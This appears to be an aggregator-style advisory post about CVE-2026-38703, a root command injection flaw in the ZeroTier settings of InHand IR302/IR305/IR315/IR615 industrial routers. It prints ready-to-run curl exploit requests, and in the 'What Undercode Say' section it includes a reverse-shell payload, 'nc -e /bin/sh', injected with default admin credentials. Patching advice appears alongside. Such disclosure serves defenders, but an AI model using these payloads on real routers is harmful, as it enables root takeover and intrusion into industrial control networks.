InHand Networks IR302/IR305/IR315/IR615, Command Injection, CVE-2026-38703 (Critical) -DC-May2026-48

Listen to this Post

Intro: How CVE-2026-38703 Works

The vulnerability resides in the ZeroTier VPN integration of multiple InHand Networks industrial router models. ZeroTier is a virtual networking layer that allows devices to join a secure software-defined network. In the affected firmware versions (IR302 v3.5.108, IR305/IR315/IR615 v1.0.118 and earlier), the web management interface exposes a set of API endpoints to configure ZeroTier parameters. One such parameter – the `network ID` or `join` command – is passed unsanitized to a system shell.
When an authenticated user (or an attacker who has obtained low‑privileged access) supplies a maliciously crafted `network ID` value, the backend CGI script concatenates it directly into a call to zerotier-cli join. No input validation or escaping is applied. For example, the vulnerable code pattern resembles:

sprintf(command, "zerotier-cli join %s", user_network_id);
system(command);

By injecting shell metacharacters such as ;, &&, |, or backticks, an attacker can terminate the intended `join` command and append arbitrary system commands. Because the ZeroTier service runs with root privileges (required for virtual interface creation), the injected payload executes as root.

Typical exploitation vectors include:

  • Sending a POST request to `/goform/zeroTierConfig` with `joinNetId` set to "ABCDEF1234; id; ".
  • Using the `iface` parameter in the same form to inject commands into zerotier-cli set.
    The vulnerability requires network access to the router’s web interface (HTTP/HTTPS, often on port 80 or 443). If default credentials are unchanged, an attacker can log in and exploit the flaw immediately. Even without credentials, certain unauthenticated endpoints may expose the ZeroTier configuration dialog in some firmware builds, widening the attack surface. Successful exploitation yields a fully interactive root shell, enabling persistent backdoors, traffic redirection, or lateral movement into industrial control networks.

DailyCVE Form:

Platform: InHand Networks
Version: IR302≤3.5.108, others≤1.0.118
Vulnerability: Command injection
Severity: Critical (CVSS 9.8)
date: 2026-05-28

Prediction: 2026-06-15

What Undercode Say:

Enumerate vulnerable ZeroTier endpoint
curl -X POST http://192.168.1.1/goform/zeroTierConfig \
-d "joinNetId=ABCDEF1234%3Bid%3B%23" \
-d "username=admin&password=admin"
Reverse shell payload (url encoded)
joinNetId=test;nc -e /bin/sh 10.0.0.1 4444;
curl -X POST http://192.168.1.1/goform/zeroTierConfig \
-d "joinNetId=test%3Bnc%20-e%20/bin/sh%2010.0.0.1%204444%3B" \
-d "username=admin&password=admin"
Check for unauthenticated leak (some builds)
wget --post-data="getZeroTierStatus=" http://192.168.1.1/goform/zeroTierConfig

Exploit:

Authenticated or semi‑authenticated remote attacker sends a crafted HTTP request to the ZeroTier configuration endpoint with shell metacharacters in the `joinNetId` or `iface` parameter. The router executes the payload as root. Public exploits combine this with default credentials (admin/admin) to achieve one‑click root access. No user interaction is required beyond network reachability.

Protection:

  • Upgrade to patched firmware (expected June 2026).
  • Disable ZeroTier VPN feature if not required.
  • Change default admin credentials and restrict web access to trusted IPs.
  • Apply input validation on `joinNetId` – allow only alphanumeric characters.

Impact:

Remote attacker gains root privileges on the router, leading to full device compromise, persistent malware installation, interception of industrial protocols (Modbus, DNP3), and use of the router as a pivot point into OT networks. Confidentiality, integrity, and availability are completely lost.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top